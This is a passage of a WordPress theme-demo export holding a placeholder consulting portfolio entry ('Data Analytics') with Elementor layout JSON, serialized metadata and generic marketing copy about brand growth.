customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"07a7ce5","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"46cd823","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"869cbd8","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Data Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=826</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>March 26, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>826</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[data-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[827]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4ff3a9c5","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"41414446","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"7cea63e4","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"17a99080","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"277d3a66","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"731b7798","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1ccb559a","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"889c447","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"27258f6a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c1d64ba","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"677ece23","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"427fc382","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b572066","elType":"widget","settings":{"editor":"<p>March 26, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"18475bca","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fa30e6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"44bd3c29","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"4348fe38","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5fa0d94e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"56bf5e7","elType":"section","settings":[],"elements":[{"id":"b94c503","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"fb726a2","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5054322","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4633d3d","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"745890c","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"dc9e21d","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"522373f","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ed01cec","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"81c8307","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7343b83","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9396a2c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"76e1f12","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7f87053","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"53ea42b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"bdcda72","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d5c5c87","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"c8cd974","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"df11958","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ea6b49","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"bb74f87","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"74340d2","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f0dc32","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b676a33","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"61154b1","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[835]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"secti